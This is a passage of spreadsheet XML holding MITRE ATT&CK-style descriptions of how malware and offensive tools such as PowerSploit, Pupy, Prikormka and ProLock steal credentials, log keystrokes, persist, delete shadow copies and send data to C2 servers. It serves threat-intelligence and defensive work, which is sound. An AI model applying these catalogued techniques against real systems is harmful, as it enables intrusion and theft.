    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can access data from local files, volumes, and processes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) has modules such as &lt;code&gt;Get-NetDomainTrust&lt;/code&gt; and &lt;code&gt;Get-NetForestTrust&lt;/code&gt; to enumerate domain and forest trusts.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of CodeExecution modules that inject code (DLL, shellcode) into a process.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Find-AVSignature&lt;/code&gt; AntivirusBypass module can be used to locate single byte anti-virus signatures.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-Kerberoast&lt;/code&gt; module can request service tickets and return crackable ticket hashes.(Citation: PowerSploit Invoke Kerberoast)(Citation: Harmj0y Kerberoast Nov 2016)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-Keystrokes&lt;/code&gt; Exfiltration module can log keystrokes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-ProcessTokenGroup&lt;/code&gt; Privesc-PowerUp module can enumerate all SIDs associated with its current token.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of ScriptModification modules that compress and encode scripts and payloads.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit path interception opportunities in the PATH environment variable.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit search order hijacking vulnerabilities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit unquoted path vulnerabilities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) modules are written in and executed via [PowerShell](https://attack.mitre.org/techniques/T1086).(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-ProcessTokenPrivilege&lt;/code&gt; Privesc-PowerUp module can enumerate privileges for a given process.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) reflectively loads a Windows PE file into a process.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;New-UserPersistenceOption&lt;/code&gt; Persistence argument can be used to establish via the &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;New-UserPersistenceOption&lt;/code&gt; Persistence argument can be used to establish via a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053).(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-TimedScreenshot&lt;/code&gt; Exfiltration module can take screenshots at regular intervals.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Install-SSP&lt;/code&gt; Persistence module can be used to establish by installing a SSP DLL.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials from Windows vault credential objects.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-WmiCommand&lt;/code&gt; CodeExecution module uses WMI to execute and retrieve the output from a [PowerShell](https://attack.mitre.org/techniques/T1086) payload.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) uses Microsoft OneDrive as a C2 server via a network drive mapped with &lt;code&gt;net use&lt;/code&gt;.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) uses a XOR cipher to encrypt command output written to its OneDrive C2 server.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) uses PowerShell loops to iteratively check for available commands in its OneDrive C2 server.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) has been used to monitor process lists.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) modifies the MAC times of its local log files to match that of the victim's desktop.ini file.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>After collecting documents from removable media, [Prikormka](https://attack.mitre.org/software/S0113) compresses the collected files, and encrypts it with Blowfish.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects passwords stored in applications installed on the victim.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) gathers logins and passwords stored in applications on the victims, including Google Chrome, Mozilla Firefox, and several other browsers.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) uses DLL search order hijacking for persistence by saving itself as ntshrui.dll to the Windows directory so it will load before the legitimate ntshrui.dll saved in the System32 subdirectory.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>After encrypting its own log files, the log encryption module in [Prikormka](https://attack.mitre.org/software/S0113) deletes the original, unencrypted files from the host.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information about the paths, size, and creation time of files with specific file extensions, but not the actual content of the file.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) contains a keylogger module that collects keystrokes and the titles of foreground windows.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) creates a directory, &lt;code&gt;%USERPROFILE%\AppData\Local\SKC\&lt;/code&gt;, which is used to store collected log files.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>Some resources in [Prikormka](https://attack.mitre.org/software/S0113) are encrypted with a simple XOR operation or encoded with Base64.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information on available printers and disk drives.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) adds itself to a Registry Run key with the name guidVGA or guidVSA.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) uses rundll32.exe to load its DLL.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) contains a module that captures screenshots of the victim's desktop.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about installed anti-virus software.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) encodes C2 traffic with Base64.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) encrypts some C2 traffic with the Blowfish cipher.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about Windows OS version, computer name, battery info, and physical memory.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about its IP addresses and MAC addresses.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about the current user name.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) can use BITS jobs to download its malicious payload.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) can encrypt files on a compromised host with RC6, and encrypts the key with RSA-1024.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) can use CVE-2019-0859 to escalate privileges on a compromised host.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) can remove files containing its payload after they are executed.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) can use vssadmin.exe to remove volume shadow copies.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) can use .jpg and .bmp files to store its payload.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) can use WMIC to execute scripts on targeted hosts.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) zips up files before exfiltrating them.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) removes logs from &lt;code&gt;/var/logs&lt;/code&gt; and &lt;code&gt;/Library/logs&lt;/code&gt;.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) gathers credentials for Google Chrome.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses an encrypted file to store commands and configuration values.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) kills security tools like Wireshark that are running.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) removes all files in the /tmp directory.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) prompts users for their credentials.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) gathers credentials in files for keychains.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses a keylogger to capture keystrokes.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) persists via Launch Agent.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) gathers credentials in files for 1password.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) captures the content of the desktop with the screencapture binary.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) modifies the tty_tickets line in the sudoers file.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses macOS' .command file type to script actions.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses VNC to connect into systems.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) automatically collects data about the victim and sends it to the control server.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) can overwrite files indicated by the attacker before deleting them.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) searches the local system and gathers data.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) performs data exfiltration over the control server channel using a custom protocol.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) can delete files indicated by the attacker and remove itself from disk using a batch file.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) lists files in directories.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) lists processes running on the system.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) gathers product names from the Registry key: &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion ProductName&lt;/code&gt; and the processor description from the Registry key &lt;code&gt;HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ProcessorNameString&lt;/code&gt;.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) registers itself as a service on the victim’s machine to run as a standalone process.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) collects the network adapter information and domain/username information based on current remote sessions.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>As part of the data reconnaissance phase, [Proxysvc](https://attack.mitre.org/software/S0238) grabs the system time to send back to the control server.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) uses HTTP over SSL to communicate commands with the control server.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) executes a binary on the system and logs the results into a temp file by using: &lt;code&gt;cmd.exe /c "&lt;file_path&gt; &gt; %temp%\PM* .tmp 2&gt;&amp;1"&lt;/code&gt;.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029) has the ability to remotely create accounts on target systems.(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029) can be used to download or upload a file over a network share.(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029), a tool that has been used by adversaries, writes programs to the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>Microsoft Sysinternals [PsExec](https://attack.mitre.org/software/S0029) is a popular administration tool that can be used to execute binaries on remote systems using a temporary Windows service.(Citation: Russinovich Sysinternals)</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029) can leverage Windows services to escalate privileges from administrator to SYSTEM with the &lt;code&gt;-s&lt;/code&gt; argument.(Citation: Russinovich Sysinternals)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) has commands to enumerate all storage devices and to find all files that start with a particular string.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) has a command to download a file to the system from its C2 server.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) has a command to conduct timestomping by setting a specified file’s timestamps to match those of a system file in the System32 directory.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) uses HTTPS for C2.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can decrypt encrypted data strings prior to using them.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can use a dynamic Windows hashing algorithm to map API components.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) exfiltrates screenshot files to its C2 server.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) identifies files matching certain file extension and copies them to subdirectories it created.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can download and execute additional files.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: Symantec Shuckworm January 2022)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) creates various subdirectories under &lt;code&gt;%Temp%\reports\%&lt;/code&gt; and copies files to those subdirectories. It also creates a folder at &lt;code&gt;C:\Users\&lt;Username&gt;\AppData\Roaming\Microsoft\store&lt;/code&gt; to store screenshot JPEG files.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can use mshta.exe to execute an HTA file hosted on a remote server.(Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) has used various API calls.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) copies itself to the Startup folder to establish persistence.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) executes functions using rundll32.exe.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) schedules tasks to invoke its components in order to establish persistence.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can capture screenshots at a configurable interval.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) has the ability to use anti-detection functions to identify sandbox environments.(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can use a malicious VBS file for execution.(Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can use HTTP for C2.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can use `cmd.exe` for execution on victim systems.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can compress data with Zip before sending it over C2.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192)'s default encryption for its C2 communication channel is SSL, but it also has transport options for RSA and AES.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can record sound with the microphone.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can use Lazagne for harvesting credentials.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a module to clear event logs with PowerShell.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can user PowerView to execute “net user” commands and create domain accounts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can migrate into another process using reflective DLL injection.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can send screenshots files, keylogger data, files, and recorded audio back to the C2 server.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can walk through directories and recursively search for strings in files.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can upload and download to/from a victim machine.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) uses a keylogger to capture keystrokes it then sends back to the server after it is stopped.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can sniff plaintext network credentials and use NBNS Spoofing to poison name services.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can execute Lazagne as well as [Mimikatz](https://attack.mitre.org/software/S0002) using PowerShell.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) uses PowerView and Pywerview to perform discovery commands such as net user, net group, net local group, etc.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can user PowerView to execute “net user” commands and create local system accounts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can interact with a victim’s Outlook session and look through folders and emails.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a built-in module for port scanning.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can list local and remote shared drives and folders over SMB.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can also perform pass-the-ticket.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a module for loading and executing PowerShell scripts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can list the running processes and get the process ID and parent process’s ID.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can use an add on feature when creating payloads that allows you to create custom Python scripts (“scriptlets”) to perform tasks offline (without requiring a session) such as sandbox detection, adding persistence, etc.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) adds itself to the startup folder or adds itself to the Registry key &lt;code&gt;SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run&lt;/code&gt; for persistence.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can enable/disable RDP connection and can start a remote desktop session using a browser web socket client.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can drop a mouse-logger that will take small screenshots around at each click and then send back to the server.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) uses [PsExec](https://attack.mitre.org/software/S0029) to execute a payload or commands on a remote host.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a module that checks a number of indicators on the system to determine if its running on a virtual machine.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can grab a system’s information including the OS version, architecture, etc.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has built in commands to identify a host’s IP address and find out other network configuration settings by viewing connected sessions.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a built-in utility command for &lt;code&gt;netstat&lt;/code&gt;, can do net session through PowerView, and has an interactive shell which can be used to discover additional information.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can enumerate local information for Linux hosts and find currently logged on users for Windows hosts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can be used to establish persistence using a systemd service.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can obtain a list of SIDs and provide the option for selecting process tokens to impersonate.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can access a connected webcam and capture pictures.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can communicate over HTTP for C2.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has decrypted and dropped the [DCSrv](https://attack.mitre.org/software/S1033) payload to disk.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has modified firewall rules to allow incoming SMB, NetBIOS, and RPC connections using `netsh.exe` on remote machines.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) will remove all created artifacts such as dropped executables.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[PyDCrypt](https://attack.mitre.org/software/S1032) has dropped [DCSrv](https://attack.mitre.org/software/S1033) under the `svchost.exe` name to disk.(Citation: Checkpoint MosesStaff Nov 2021)
</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has been compiled and encrypted with PyInstaller, specifically using the --key flag during the build phase.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has attempted to execute with PowerShell.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032), along with its functions, is written in Python.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has used [netsh](https://attack.mitre.org/software/S0108) to find RPC connections on remote machines.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has probed victim machines with &lt;code&gt;whoami&lt;/code&gt; and has collected the username from the machine.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has used `cmd.exe` for execution.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has attempted to execute with WMIC.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
